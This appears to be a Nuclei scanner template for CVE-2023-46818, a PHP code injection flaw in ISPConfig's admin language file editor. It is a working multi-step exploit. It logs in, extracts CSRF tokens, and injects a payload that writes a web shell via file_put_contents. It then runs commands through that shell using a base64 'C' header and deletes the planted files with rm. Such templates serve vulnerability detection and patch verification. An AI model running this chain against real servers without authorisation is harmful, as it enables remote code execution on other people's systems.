id: CVE-2023-46818 info: name: ISPConfig - PHP Code Injection author: non-things severity: high description: | An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled. reference: - https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/ - http://packetstormsecurity.com/files/176126/ISPConfig-3.2.11-PHP-Code-Injection.html - http://seclists.org/fulldisclosure/2023/Dec/2 - https://nvd.nist.gov/vuln/detail/CVE-2023-46818 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2023-46818 cwe-id: CWE-94 metadata: verified: true max-requests: 1 product: ispconfig tags: cve,cve2023,ispconfig,php,rce flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) variables: lang-file: "{{rand_text_alpha(26)}}.lng" websh-file: "{{rand_text_alphanumeric(32)}}.php" websh: "" websh-base64: "{{base64(websh)}}" payload: "'];file_put_contents('{{websh-file}}',base64_decode('{{websh-base64}}'));die;#" payload-url-enc: "{{url_encode(payload)}}" echo-cmd-hash: "{{rand_text_alphanumeric(32)}}" echo-cmd: "echo {{echo-cmd-hash}}" http: - raw: - | POST /login/index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}}&s_mod=login matchers: - type: dsl dsl: - 'contains(header, "Set-Cookie")' - 'status_code == 302' condition: and - raw: - | POST /admin/language_edit.php HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded lang=en&module=help&lang_file={{lang-file}} matchers: - type: dsl dsl: - 'contains_all(response, "_csrf_id", "_csrf_key")' - 'status_code == 200' condition: and extractors: - type: regex name: lang_file_location group: 1 regex: - "Language file: (.*)" internal: true - type: regex name: csrf_id group: 1 regex: - "_csrf_id\" value=\"(.*)\" />" internal: true - type: regex name: csrf_key group: 1 regex: - "_csrf_key\" value=\"(.*)\" />" internal: true - raw: - | POST /admin/language_edit.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded lang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}} matchers: - type: dsl dsl: - 'status_code == 200' - raw: - | GET /admin/{{websh-file}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded C: {{base64('§echo-cmd§')}} matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "{{echo-cmd-hash}}" - raw: - | GET /admin/{{websh-file}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded C: {{base64('rm §lang_file_location§')}} matchers: - type: status status: - 200 - raw: - | GET /admin/{{websh-file}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded C: {{base64('rm §websh-file§')}} matchers: - type: status status: - 200 # digest: 4b0a00483046022100b1477a1e39d3f98efffd283596a2a924a6381e8a6c7a640e99afc1128b907abd022100dac9d4a63ce04aed8df7a74d631dd9774ff4a6e4ee75579fced5cd3c0681d631:922c64590222798bb761d5b6d8e72950